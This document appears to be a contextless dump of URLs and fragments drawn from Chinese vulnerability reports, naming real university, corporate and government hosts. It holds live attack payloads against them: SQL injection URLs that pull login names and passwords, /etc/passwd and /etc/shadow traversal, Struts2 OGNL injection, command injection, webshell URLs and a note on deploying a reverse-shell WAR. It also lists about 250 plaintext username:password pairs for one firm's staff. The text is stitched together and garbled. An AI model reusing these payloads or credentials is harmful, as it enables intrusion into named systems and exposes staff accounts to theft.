ftp://123.162.191.120/没有设置密码,可以直接访问,整站源码可以down下来 http://xml.rayli.com.cn/xf/?a=t&id=1&m=topic http://**.**.**.**/newsshow.php?id=2255 XSS:http://**.**.**.**/index.php http://dujia.lvmama.com:80/trip/destPaginationOfTrip?currentPage=1&destId=3727,3729,3543&elite=1&categoryCode=category_route_group http://idm2.tcl.com:8088/jsp/index.jsp http://**.**.**.**/bugs/wooyun-2010-082455 file:///D:/FE/jboss/server/default/deploy/fe.war/WEB-INF/classes/jdbc.properties http://**.**.**.** http://**.**.**.**/news.php?category=41 http://**.**.**.**/news_detail.php?newsId=5232 http://**.**.**.**/news_detail.php?newsId=5231 http://**.**.**.**/news_detail.php?newsId=5229 http://**.**.**.**/news_detail.php?newsId=5227 http://eyou.huatu.com/ http://**.**.**.**/ui/logon/InitUserSave.jsp http://**.**.**.**/ui/logon/InitUserSave.jsp http://**.**.**.**/ui/logon/main.jsp http://tiyu.nchu.edu.cn/bigclass.asp?id=3 inurl:http://gopurchase.haier.com/GOPurchase/page/Base/ http://gopurchase.haier.com/Gopurchase/page/Base/LSupplyerIntroduceAppraisal/LSupplyerRegist/LSupplyerRegistInfo.aspx?state=2&userNo=hexinjixie http://gopurchase.haier.com/GOPurchase/page/Base/LSupplyerIntroduceAppraisal/LSupplyerRegist/LSupplyerRegistInfo.aspx?state=2&userNo=bogesi http://gopurchase.haier.com/GOPurchase/page/Base/LSupplyerIntroduceAppraisal/LSupplyerRegist/LSupplyerRegistInfo.aspx?state=2&userNo=bogesi http://111.13.100.253/pcheck/index.php?action=showPcheck&report=../../../../../../../../../../etc/passwd http://learning.ufh.com.cn/login.do http://career.ruc.edu.cn http://rd.haierpeople.cn/ http://**.**.**.**/solr/#/ http://**.**.**.**/search.zip http://**.**.**.** http://**.**.**.**:3000/ http://**.**.**.**:3000/AffairsPublic/list.aspx?cid=33&cityid=4412 http://**.**.**.**/comp/110/?title=1 http://**.**.**.**/ http://**.**.**.**/ http://219.217.226.139/ http://219.217.226.139/console http://**.**.**.**/service/message/list?typeId=9 http://**.**.**.**/admin/index.php?m=public&a=login http://api.super8.com.cn:8081/ http://oa.cpi.jx.cn/yyoa/index.jsp http://**.**.**.**/web.rar http://**.**.**.**/1.zip http://**.**.**.**/1.zip http://**.**.**.**/1.zip http://**.**.**.**/1.rar http://**.**.**.**/www.rar http://**.**.**.**/web.rar http://**.**.**.**/1.rar http://**.**.**.**/1.rar http://**.**.**.**/web.zip http://**.**.**.**/1.rar http://**.**.**.**/web.rar http://**.**.**.**/1.rar http://**.**.**.**/1.rar http://**.**.**.**/1.zip http://**.**.**.**/wangzhan.rar http://**.**.**.**/123.zip http://**.**.**.**/root.rar http://**.**.**.**/data.rar http://**.**.**.**/web.zip http://**.**.**.**/1.rar http://**.**.**.**/mdb.rar http://**.**.**.**/mdb.rar http://**.**.**.**/123.zip http://**.**.**.**/web.zip http://**.**.**.**/root.rar http://**.**.**.**/1.rar http://**.**.**.**/web.zip http://**.**.**.**/123.zip http://**.**.**.**/www.zip http://**.**.**.**/1.zip http://home2014.xizi.com weixin:printer jdbc:mysql**.**.**.**/waawo?characterEncoding=utf8&zeroDateTimeBehavior=convertToNull http://acadol.hnu.edu.cn http://acadol.hnu.edu.cn www.acunetix-referrer.com/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//m8100.talk99.cn/monitor%2Cp0%3Ahttp%253A//acadol.hnu.edu.cn/Hunan/university/news/list.do http://**.**.**.**/search.aspx?key= http://**.**.**.**/search.aspx?key= http://**.**.**.**:8090/files/ http://mail2.glsc.com.cn:8093/stcenter.nsf http://mail2.glsc.com.cn:8084/names.nsf/$users ShenZ:148501 bwang:123456 caiyl:caiyl8 caol:1qaz2wsx chaixm2:888888 chenaw:chenaw chenb:168168 chench:999999 chenghl1:112358 chenkp:888888 chenl1:888888 chenmeng:chenmeng chenq1:888888 chensx:123456 chentl:888888 chenww2:117225 chenwz:654321 chenxf:123456 chenxuey:191928 chenym:chenym chenyu:147258 chenzy:chenzy888 chult:196671 chuxy:110119 chxj:ccccc cuimm:135616 daizhen:168168 dengmy2:888888 dingying:999999 dingyj:123123 emonitor1:123456 emonitor2:123456 fanjw:130139 fanyh:8899 fenghj:123456 fengk:123456 fengkj:888 fuwutai:Abcd1234 gaojy2:888888 genghr:198891 gengsf:176537 gengzc:password gloud2:123123 gloud3:123123 glqhyf1:123456 gucq:888888 guoh:999999 guoy:110119 gxzjj:gxzjj houj:gl123 houwr:124425 houyt:999999 huawr1:abc123 huawr2:102501 huawr:102501 huiy:142857 huoyq:123456 huyangl:888888 info-glcmc:194806 jial:123456 jiangaz2:888888 jiangjm:shandan jiangl:999999 jianglj:123123 jiangq:Asdf1234 jiangs:abcd1234 jiaoxp:666666 jil:654321 lianghf:102921 libo:abcd1234 lic:tracy1 lichenjie:135246 lij2:888888 liliang:198610 limd:123456789 linfy:linfy liuhuan:liuhuan2 liuhx:168000 liupf:140630 liusr:123qwe lixinr:123123 liyj:107108 liyue:liyue888 lizh:lizh8888 lizhen:199175 lubin:888888 lucx:abc123 lujn:199115 lujw:153201 lumin:a123456 lumj:888888 luqx:123456 lus:000000 luyq:888888 luzk:abcd1234 lvzl:130133 maty1:123123 meix:888888 nil:19740124 niy:101010 panbb:12345 panq:abcd1234 panyj:123123 pengyb:pengyb123 qiank:888888 qszy:123456 quey:quey1962 renzx:renzx123456 shanxy1:888888 shaolin:198900 shaoxq:666666 shaoyl:hello shaql:139120 shenc:sc1106 sheng:171717 shenjie:121212 shenlj:198712 shenyg:123123 shenzy:123123 sunbin:123456 sunmx:888888 suw:110110 szkf:888888 tangj:666666 tangzh:abcd1234 taocl:taocl taomy:888888 tongbz:888888 wangbing:133976 wangchunxiang:111111 wangcong:wangcong wangfj:888888 wangj1:wangj wangjie:a123456 wangk:888888 wangq:wangq wangquan:wq111 wangqx:121800 wangsy:000000 wangt:password wangxinyi:wangxinyi& wangxm:123abc wangxy2:888888 wangy2:888888 wangye:abcd1234 wchao:abcde wj:12345678 wll:101089 wuting:wuting1989 wuxj:abcd1234 wuxq:888 wxj:wxj888 xiaow1:180783 xiat:198706 xiefang:123654 xinc2:888888 xuc:111111 xuej:111111 xuexl1:888888 xuezy:888888 xufl:123789 xug:xug123456 xujie:888888 xuke:xuke1990 xumx:zxcvbnm xumz:654321 xuwb1:888888 xuyd1:888888 yangj1:yangj yangjie:12173 yangro:123321 yangrq:198474 yangyj:198789 yanhm:similar yingxw:aaaaa yuanlj:888888 yubin:123456 yud:999999 yuj:147258 yury1:yury yutq:11111 yuziyue:yuziyue1993 yyue:888888 zhangcy:zhangcy zhanghao:888888 zhangjf:888888 zhangjie:444444 zhangjunl:123123 zhangn:123123 zhangw1:147369 zhangxc:198511 zhangxin:0123456 zhangym:888888 zhangyu:198308 zhangyunyx:888888 zhangzj:abcd1234 zhaojiong:132153 zhaoy:legend zhongtai:zhongtai123 zhongwy:198468 zhoujj:a123456 zhoulian:777777 zhoupq1:zhoupq zhouqin:114123 zhouwh:abcd1234 zhouwp:888888 zhouxb:zhouxb zhubc:181818 zhuc2:888888 zhucx1:abc123 zhutt:zhutt zhuxl:888888 zhuzn:zhuzn123456 zouhz:888888 zouj:5104 zqian:888888 http://newoa.glsc.com.cn:8082/ http://bbs2.glsc.com.cn:8088/glscbbs/ http://help.glsc.com.cn http://learning.ufh.com.cn http://learning.ufh.com.cn/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../../../ http://**.**.**.** http://master.duomai.com/index.php?a=slist&category_id=36&m=scoremall&order=date http://www2.sdu.edu.cn www2.sdu.edu.cn http://**.**.**.**/c6 http://**.**.**.**/c6/jhsoft.web.login/GetPassWord.aspx?flag=getEmail&UserName=admin http://clbz.scu.edu.cn/打不开) http://clbz.scu.edu.cn:8080/com.wisesoft.cdreg.web/vehicleregistration/getCheckByList.html http://clbz.scu.edu.cn:8080/com.wisesoft.platform.web/cdreg/login/welcome.html(系统1) http://clbz.scu.edu.cn:8080/com.wisesoft.cdreg.web(系统2) http://clbz.scu.edu.cn:8080/com.wisesoft.cdreg.web/vehicleregistration/toList.html http://clbz.scu.edu.cn:8080/fileuploads/chopper.jsp jdbc:oracle:thin:@127.0.0.1:1521:orcl jdbc:postgresql://192.168.9.2:5432/ipms https://**.**.**.**/i-trade/ http://mail.jnu.edu.cn http://passport.wanglibao.com/ http://211.151.235.90/etc/passwd http://pgzx.nchu.edu.cn https://vpn.fjmu.edu.cn/web/1/http/0/www.fjmu.edu.cn/s/49/t/311/28/96/info10390.htm http://**.**.**.**/announce/outside/content.asp?DOCID=609&HISTORY=-1 http://**.**.**.**/cms/templet_pro.do http://**.**.**.**/cms/images.jsp http://**.**.**.** http://**.**.**.**/shows.aspx?id=85&ids=1299 http://**.**.**.**/admin/Login.aspx http://**.**.**.**/jiuzhen/index.php?id=19 http://life.ufh.com.cn/guidelist.php?g_id=11 http://**.**.**.**/ http://**.**.**.**/login/Login.jsp http://jxjy.nchu.edu.cn/checkuser.asp?email_ACT=-1 http://**.**.**.**/bugs/wooyun-2010-0149415 http://114.112.92.106/.svn/entries http://114.112.92.106/index.html http://219.143.162.218/htwx/indexlis.jsp http://219.143.162.218/htwx/logon/menu.jsp?userCode=admin&Ip=123&nodecode=123 http://221.2.68.102:8888/R9iPortal/cm/cm_info_content.jsp?info_id=42 http://vendor.xiu.com/login.action http://www.haibao.com/index.php?c=Survery&a=Survery&id=17'%20and%201%3d2%20and%20'a'%3d'a&tplid=3 http://**.**.**.**/myscm/.svn/entries http://**.**.**.** bid.foxconn.com.cn/bidvendor/bidweb/data/Database.mdb http://bid.foxconn.com.cn/bidvendor/bidweb/login.asp https://mail.xdf.cn ftp://**.**.**/ http://**.**.** https://vpn.xdf.cn http://400.xdf.cn/knowledge/index.jhtm?providerNo=3001&articleId=229 https://gate.staff.xdf.cn https://gate.staff.xdf.cn, http://www.chanhen.com:801/web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://www.chanhen.com:801/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResource http://www.chanhen.com:801/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourceManager http://xd.chanhen.com/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResource http://xd.chanhen.com/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager http://xd.chanhen.com/messager/users.data http://www.chanhen.com:801/messager/users.data http://ecis.chanhen.com:89 http://www.chanhen.com:801/tools/SWFUpload/upload.jsp http://www.chanhen.com:801/nullwoo.jsp http://oa.riit.tsinghua.edu.cn/yyoa/index.jsp http://www2.chanhen.com/publicjob.asp?id=2 http://www2.chanhen.com/publicjob.asp?id=2 http://**.**.**.**/index.action?request_locale=zh_TW http://**.**.**.**/index.action?request_locale=en_US http://**.**.**.**/index.action?request_locale=zh_TW http://**.**.**.**/index.action?request_locale=zh_TW http://www.epm.neu.edu.cn/wangqiang/en/News_search.asp?bid=1&pageno=2 http://m.cofcopack.com:8080/Campus.aspx http://115.29.202.192:8081/console https://github.com/JohnZhangJava https://github.com/JohnZhangJava/MyWorkSpace/blob/e05a950c91b34641de3361b47c83282e8ff80571/project/p2p/p2p_v1_3_1_server/.svn/pristine/b3/b39b184350c6c3179a3bce753c5e16182ba0029a.svn-base jdbc:mysql://10.210.51.***:3306/cms_sxxh?useUnicode=true&characterEncoding=utf-8 http://**.**.**.**:7007/console/login/LoginForm.jsp http://**.**.**.**/,如图所示: http://**.**.**.**:8088/,OA系统,如图所示: http://**.**.**.**:8088/ http://jk.gtcloud.cn/portal/login_init.action http://**.**.**.**/login.do http://sy.tiku.huatu.com http://www.chanhen.com:801/ http://www.chanhen.com:801//page/maint/login/Page.jsp?templateId=18 http://mrtg.neu.edu.cn/cacti/graph.php?action=properties&graph_end=1449299263&graph_start=1449212863&local_graph_id=1130&rra_id=0&view_type=tree http://**.**.**.**/ http://**.**.**.** http://115.29.202.192:9001 http://sns.tgbus.com/pspdatareader/down.aspx?gid=c02bc722-74d7-4f7c-82eb-6684af7bdefb redirect:http://**.**.**.**/ http://**.**.**.** http://221.8.57.106:7009/console/login/LoginForm.jsp http://authors.cnhubei.com/login.html http://authors.cnhubei.com/ashx/Service.ashx?method=GetOnLineUser http://chat.zohi.tv/livechat/ http://chat.zohi.tv/livechat/login.jspa?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://219.232.237.70:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://219.232.237.70:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://219.232.237.70:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://**.**.**.** http://218.78.217.82:2012/newInsuranceQxx/ http://fan.ip66.com/ http://re.ip66.com/ http://boss.exmail.qq.com/index.html http://plus.zealer.com/user/sendMessage http://plus.zealer.com/sendPost/post http://plus.zealer.com/user/userUpdate?name=&email=&password=&resetpwd= http://www.ch.com/春秋航空的,扫其C段发现存在漏洞的机器 http://**.**.**.**:8080/admin/ http://**.**.**.** http://**.**.**.**:8000/admin/login.jsp http://**.**.**.**/ac_showArticle.action?article_id=663 https://github.com/jerryhjy/anjuke/tree/master/docs https://github.com/jerryhjy/anjuke/blob/785ebfe120c9e81fe57914f5f19ac266edb548fb/docs/BizDesc/Member/%E7%94%A8%E6%88%B7%E4%B8%AD%E5%BF%83%E6%A6%82%E8%BF%B0.md https://github.com/jerryhjy/anjuke/blob/master/docs/API/%E5%85%B6%E4%BB%96%E5%B0%8F%E7%B3%BB%E7%BB%9F/%E4%BE%9B%E5%BA%94%E5%95%86%E6%B8%A0%E9%81%93%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/README.md http://m.zzz4.com/pk/info.php?id=1 http://**.**.**.**/pinggu/result.aspx?id=1051 http://218.78.217.82:8094 www.damailicai.com)是长城证券战略投资的互联网理财平台,专注于上市公司供应链融资业务,已完成B轮融资,是P2P行业少数几家已经获得B轮风投的P2P平台。(官网介绍) http://**.**.**.**/save.asp?id= http://111.204.108.33 http://teach.gaosiedu.com/wwwroot.tar http://**.**.**.**/IRenderService/CreateChart http://202.108.103.191:8080/wfWeb http://202.108.103.191:8080/BizCoreWS/ http://202.108.103.191:8080/BizCoreWS/axis2-admin/ http://221.239.62.23:9080/sis/indexlis.jsp http://221.239.62.23:9080/sis/common/cvar/CExec.jsp http://www.shouhuobao.com/merchant/index.html http://msg.shouhuobao.com:9090/ http://iepi.neu.edu.cn http://**.**.**.**:7002/ http://221.239.62.23:9080/sis/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts http://221.239.62.23:9080/sis/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd http://lib.htfutures.com/ http://lib.htfutures.com/ld_notice.php?Nid=16 http://mail.228.com.cn/ http://**.**.**.**/sq/common/download?s=C08010000_A001_shequ_908010000&t=2 http://**.**.**.**:235/dylgy/Login.aspx http://webchat.cpic.com.cn:8183/webstat存在SSRF漏洞,可探测内网主机开放端口。 http://**.**.**.**/features.php?KindID=10&ID=216 http://**.**.**.**/admin/index.php http://202.108.103.191:8081/reins http://mail.huatu.com http://**.**.**.**/festival.php?id= http://**.**.**.**/forumtext.php?forum_id=1498 https://vpn.wanda.cn http://**.**.**.**/www.zip http://www.bookasia.cn/Login/index?out=1 http://**.**.**.**/designinfo.php?id=-1 http://180.149.144.31:8091//getpoidetail.php?bid=;%20pwd;%20/sbin/ifconfig;%20whoami;%20curl%20baidu.com;hostname encap:Ethernet F3:FC:4A:BA:CE addr:10.95.16.37 Bcast:10.95.16.127 Mask:255.255.255.128 MTU:1500 packets:90981233561 dropped:59842 packets:69326320680 txqueuelen:1000 http://**.**.**.**/ http://**.**.**.**/admin.php http://219.217.226.139/ http://zyxw.dlmu.edu.cn:8080/ZYXWMPA/login/login_logout.do http://mock.wenwen.sogou.com/org/index.do http://**.**.**.**/admin/main.php http://ais-pr.sleb.cn/ter/ http://ais-pr.sleb.cn/ter/common/cvar/CExec.jsp http://114.80.121.109:8080/ http://www.guagua.cn/ http://order.guagua.cn/buyRoom!default.jspa http://order.guagua.cn/buyRoom.jspa?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://**.**.**.**/ http://**.**.**.**/class/gr_add.asp?id=2526 http://bolt.xunlei.com/bbs/forum.php http://xlue.xunlei.com/bbs/config/config_ucenter.php http://zs1.zzz4.com/ToHtml/Html_New.asp?d=2015-10-9&id=1&lx=news http://datong.china51766.com JHSoft.WCF/POSTServiceForAndroid.svc/LoginNew http://www.tosot.com.cn/ http://www.tosot.com.cn/about.php?id=1&op=1 http://www.tosot.com.cn/administrator/default.php http://1hz.gree.com/ http://1hz.gree.com http://www.qzyy.net.cn www.qzyy.net.cn http://bao.jd.com/vehicle/trade http://bao.jd.com/vehicle/ http://office.chder.com/yyoa/index.jsp admin.php/Public/checkLogin http://b2b.haier.com http://**.**.**.**/Login.aspx http://**.**.**.**/Loginout.aspx?mac=86F4963E7991F0F8 http://qr.hisense.com/ http://**.**.**.**:8080/ http://**.**.**.**/admin/login.asp http://youxue.xdf.cn/whitecollar/Account/CheckLegalUserName?UserName=admin http://youxue.xdf.cn/whitecollar/Account/CheckLegalUserName?UserName=admin%27%20and%20%271%27like%20%271 http://dev.mumayi.com/index/city?pid=2 https://**.**.**.**/junehappylove/myjwy/blob/bb0b9c7a63cfba5a26ad6f2ace2ed3af993221b6/src/mail.properties http://sfocs-i.sf-express.com/SFweb/handler.action http://**.**.**.**:8080/dataPass/login.action http://**.**.**.**:7001/index.shtml存在java反序列化漏洞 http://www.dfrobot.com.cn www.dfrobot.com.cn http://218.58.70.237:8080/css/login/login.html www.shbeidou.com http://222.73.45.249/invoker/JMXInvokerServlet存在java反序列化漏洞 http://sttc.sh.tobacco.com.cn JHSoft.WCF/POSTServiceForAndroid.svc/LoginNew http://**.**.**.**/neiye.php?id=102 http://**.**.**.**/admin/login.php并进入。 http://www.dfmg.com.cn:8008/scn/news.jsp?id=1 http://www.dfmg.com.cn:8008/tcn/news.jsp?id=1508 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/master/Login.asp http://oa.htfutures.com/login/login.jsp http://oa.htfutures.com/messager/users.data http://**.**.**.**/ http://**.**.**.**/admin/upload.aspx http://**.**.**.**/ http://**.**.**.**/plSearchByDoctor.aspx?Doctor= http://**.**.**.**/plSearchHospital2.aspx?ID=2027 http://**.**.**.**/plSearchList.aspx?TYPE=DEPT&ID=%27%20or%20%271%27=%271 http://**.**.**.**/zkDoctorList.aspx?Type= http://**.**.**.**/zkZiXun.aspx?ID=ZK00000019 http://**.**.**.**/zkYuYue.aspx?HOSPITALID=ZK00000019 http://alwayson.hp.com.cn/ http://alwayson.hp.com.cn/aas/ http://alwayson.hp.com.cn/aas/y.aspx http://hzqxjycom.cw113.bizcn.com/cms/Login.aspx http://180.76.16.101 http://**.**.**.**/ index.php/Public/checkLogin/ http://share.yadea.com.cn port:8787 http://218.57.112.198:9000 http://service.zol.com.cn/survey_new/submit_vote.php http://easyryt.com/default/images/sk15.txt http://**.**.**.**/htgl/top.asp http://**.**.**.**/admin/top.asp http://**.**.**.**/gbook/?18_1.html http://**.**.**.**/db http://**.**.**.**/images/_notes http://**.**.**.**/aspnet_client/system_web http://**.**.**.**/db.rar直接下载 http://**.**.**.**/aspnet_client http://idke.ruc.edu.cn http://cemftp.ce-air.com/yyoa/index.jsp http://www.1hai.cn/c/orderlogin.aspx?url=step5.aspx%3faction%3d2 http://**.**.**.**/ADMIN/ http://**.**.**.**/ADMIN/sd_theme.asp?act=edit&filename=../version.asp http://**.**.**.**/Web_sc/login.gn http://speed.tgbus.com/tgdb/car/202.shtml tomcat:tomcat进入。直接上传reverse.war包。回弹administrator权限,直接提权至system权限。 http://**.**.**.**/products/products_list.php?offset=0&cid=233*&sort=p.proNo http://59.151.39.93:7002 http://59.151.39.93:7002/shell/shell.jsp?cmd=whoami http://59.151.39.93:7002/manager/index.jsp http://112.65.254.133:8080/invoker/JMXInvokerServlet http://**.**.**.**/cart.php?Action=add_item&pid=45*&qty=1 http://**.**.**.**/news.php?tid=9* http://**.**.**.**/ncu7060/cp_right.php?pno=863 http://**.**.**.**/ncu7060/cp_right.php?pno=922 http://*.*.*.*:8080/invoker/JMXInvokerServlet http://crm.fabpo.com:8000/develop/systparam/softlogo/file2.jsp http://mail.fabpo.com/ http://www.rqzhzh.net/admin.php http://hz.cofcopack.com/ http://hz.cofcopack.com/client.do?method=getpage&sessionkey=abcnez-_N4wQ25akB2bgv&module=6&scope=3&detailid=3 http://211.150.74.101:7001/ http://**.**.**.**:8000/ http://online.3g.ifeng.com/live/manager/ifeng_match_live.php?&match=7192 http://online.3g.ifeng.com http://rom.lidroid.com/article?id=126&root=125 https://owa.corp.gome.com.cn http://**.**.**.**/ls_list_desc.php?cid=29&id=301 http://**.**.**.** http://wap.120ask.com/wap/logins http://**.**.**.**:8081 http://**.**.**/jhtml/index_ http://**.**.**/action/hdjl/addWZ2.actionwriteType=2&&wtid=43_ http://**.**.**.**/存在java反序列化命令执行漏洞漏洞,发现服务器被人留了webshell后门。。目标为: http://**.**.**.**/ahzxcms/web/zrmd.jsp?strJH=%CA%AE%D2%BB%BD%EC&strMemDuty=06%2c07&strSId=1421291498714299&type=05 site:oa.chinatowercom.cn site:project.chinatowercom.cn http://www.buywit.cn/index.php/help/clist/?key=-1 http://m.sfn.cn/pcview.html?url=http://uimall.pflife.com.cn/online/business/partnerMap/findReviewPC.do?serialNo=8a838eaf4982df67014982f02c2e004f http://m.sfn.cn/admin/ http://www.zhihuishu.com/ http://wy.nenu.edu.cn/fckeditor/editor/filemanager/connectors/uploadtest.html,此处上传点通过%00截断文件夹路径可导致任意上传。 http://app.tgbus.com/correlate/data.ashx?t=load&callback=callback06490636034868658&source=tgbus&id=c1&channel=电玩&type=news&domain=0&top=6&imgwidth=63&imgheight=63 http://**.**.**.**/Search/Do/ http://www.edufe.com.cn/lcenter/lcenter.php?action=lcenter_award&year_v=-1 http://chexiang.1hai.cn/Login/ForgetPassword http://**.**.**.**/rhin_ehr/reviewLoginHa.action http://219.218.118.168:8089/ http://**.**.**.**/ AjaxService.svc/SiteVisiteNum http://**.**.**.**/AdminUser/UserForm/?admin_user_id=2 http://**.**.**.**/invoker/JMXInvokerServlet http://image.91bihu.com/images/2015/11/10/IDCard/ http://**.**.**.**/salary/studentls.php http://**.**.**.**/position/zp_index.php?id=5 www.muzhiwan.com http://www.muzhiwan.com http://shop.zzz4.com/hj/home/index.asp http://122.97.17.92,之前看了下曾被报过jboss漏洞,试试能不能跑出反序列化来 http://**.**.**.**/index.php?c=default&a=infoX&p=7&id=25 http://isub.snssdk.com/2/user/profile/v2/?user_id=174&iid=3334171937&device_id=8932146&ac=wifi&channel=app_download&aid=13&app_name=news_article&version_code=502&version_name=5.0.2&device_platform=android&abflag=5&ssmix=a&device_type=MI+2&os_api=16&os_version=4.1.1&uuid=867064013746720&openudid=df490e5c389f6304&manifest_version_code=502&resolution=720*1280&dpi=320 http://p1.pstatp.com/medium/2270/3792614991 http://121.15.167.239:9000/invoker/JMXInvokerServlet http://**.**.**.**/bugs/wooyun-2010-0132422 http://123.232.100.133:8080/ http://quan.zzz4.com/index.php?act=coupon&area_id=&city_id=2&class_id=&class_id_1=&mall_id=&op=list&orderby=1&sort=asc http://**.**.**.**/index.php?page=actinfo&id=799&cid=3eb7bcb448ebc01e12925e514be4617e67ee40df http://www.hexin99.com/ http://**.**.**.**/bugs/wooyun-2010-0125282 http://**.**.**.**:8080/attachment/3028000338/error425278.php http://114.119.6.28/ http://114.119.6.41/ http://gyjj.tcl.com/gyjj.tcl.com.rar http://106.2.66.42/ http://219.128.102.212:8380/ebridge_galanz/security/index.jhtml http://www.scrcoabj.com/yyoa/index.jsp view-source:http://www.scrcoabj.com/yyoa/common/SelectPerson/reloadData.jsp http://www.scrcoabj.com/yyoa/checkWaitdo.jsp http://oa.sy-yy.com:8989/yyoa/index.jsp http://gykgah.com/yyoa/index.jsp http://61.163.78.6:8080/yyoa/index.jsp http://**.**.**.**/ http://www.huirenyy.com/ http://www.huirenyy.com:1234/login.action http://**.**.**.**/agent/login.php http://alumni.edaao.sysu.edu.cn/ https://github.com/fp2009/YSD/blob/4a9fe2325a0d4132da8e4c424347fc02608ebf8b/src/main/java/com/ysd/pro/common/utils/SendMailUtil.java http://android.myapp.com/myapp/detail.htm?apkName=com.blossom.rzc http://**.**.**.**/load.loadPage.d?page=chaxun_dg.xml&siteCode=xkjdpt http://**.**.**.**/hyxhweb/load.loadPage.d?page=dlxh_detail.xml&newsid=13502845&siteCode=dzfw&urlChannelId=1181&urlMenuId=1181 http://www.yongcheng.com/ http://**.**.**.**:8008/login/Login.jsp?logintype=1 http://**.**.**.**/bugs/wooyun-2010-076547 http://**.**.**.**:8004/login.do http://**.**.**.**:8003/ http://**.**.**.**/ http://**.**.**.**/restaurant_content.php?id=5 http://cis.xbwl.cn/login!init.action http://cis.xbwl.cn/www.jsp http://**.**.**.**/admin/Login.aspx http://tee.sports.sohu.com http://www.yasabake.com旁站存在注射 http://**.**.**.**/APC/Index.html http://**.**.**.** http://222.189.156.67:8089/yyoa/ www.xiaoyuan52.com http://www.xiaoyuan52.com/ http://www.chnpec.com/cpec_tran/index.php?action=translat-ShowLogin http://www.chnpec.com/cpec_zh/index.php?action=login-checklogin http://www.chnpec.com/cpec_international_zh/index.php?action=login-checklogin&rel=L2NwZWNfaW50ZXJuYXRpb25hbF96aC8= http://www.chnpec.com/cpec_international_en/index.php?action=login-checklogin&rel=L2NwZWNfaW50ZXJuYXRpb25hbF9lbi8= www.chnpec.com http://**.**.**.**/bhwebins/client/ encap:Ethernet B3:0B:44 feb3:b44/64 Scope:Link MTU:1500 packets:413976718 packets:467656991 txqueuelen:1000 http://**.**.**.**/public/detail.php?BookwareID=73855753 http://**.**.**.**/newweb/bookproduct.php?TypeID=1 http://**.**.**.**/newweb/course.php?TypeID=2 http://**.**.**.**/public/detail.php?BookwareID=73855753 http://**.**.**.**/newweb/bookproduct.php?TypeID=1 http://**.**.**.**/newweb/course.php?TypeID=2 http://123.127.251.8:7001/console/login/LoginForm.jsp jdbc:oracle:thin:@10.10.139.1:1521:finarp jdbc:oracle:thin:@10.10.134.23:1521:slistest http://**.**.**.**:16080/jmx-console/站点存在java反序列化漏洞,使用的是jboss http://new.edong.com/Host/Exclusive_Host.aspx?typeid=23&languageid=3&lineid=1 http://www.lionfund.com.cn/chatshow/flowNewQuetbean.jsp?localid=-1 http://**.**.**.**/hhsi/allusermanager.action?action=inPlatintruduction存在命令执行漏洞 http://finance.inewsweek.cn/baidu_siteapp_detail.php?id=70382 http://politics.inewsweek.cn/ipad_content.php?id=85168 http://hc.tgbus.com/ http://ygzs.shutcm.edu.cn/ http://ygzs.shutcm.edu.cn http://cis.xbwl.cn/vms/ http://cis.xbwl.cn/vms/login.do?dispatch=getUser&usercode=00000 http://cis.xbwl.cn/vms/login.do http://**.**.**.**:7001/etrading/ http://**.**.**.**:7001/console http://**.**.**.**:7001/spy/cmd.jsp?pwd=023&cmd=whoami http://**.**.**.**/sa/dls/dls04/dls04-3/newssig.asp?id=11 http://**.**.**.**:8081 http://219.143.202.137:8080/login.action http://219.143.202.137:8080/she11.jsp http://**.**.**.**/sexedu/b5/event/event_details.asp?evID=289 http://web20.kingdee.com/PushPlatform/user_login.action http://flight1.mangocity.com http://**.**.**.**/nweb/ http://www.sinopharmsx.com:9090/ http://**.**.**.**/cc2/courseview.asp?classnum=CC10326 http://180.169.5.238/amp/shell.jsp http://**.**.**.**:8016/company.aspx http://**.**.**.**:8016/upload/15129090751329.asp http://**.**.**.**/CareerGuide/FrontShow/paper_display.aspx?menu_id=5&submenu_id=413&apmenu_id=1598 http://www.fft365.com/User/UpdateUserPwd.aspx?saveType=1&ismypwd= http://www.fft365.com/User/SaveUser.aspx?action=edit&self=self&editType=1 http://www.fft365.com/Department/UpdateDeptCompanyName.aspx http://www.fft365.com/Department/PermitIPList.aspx http://www.fft365.com/Department/LoginTime.aspx http://www.fft365.com/Aid/BatchTransfer.aspx http://www.fft365.com/Department/DeptAdd.aspx http://www.fft365.com/Department/DeptList.aspx http://www.fft365.com/User/AddUser.aspx http://www.fft365.com/User/UserList.aspx http://www.fft365.com/User/UserPurviewFullList.aspx http://oa.hengansl.com/data/ 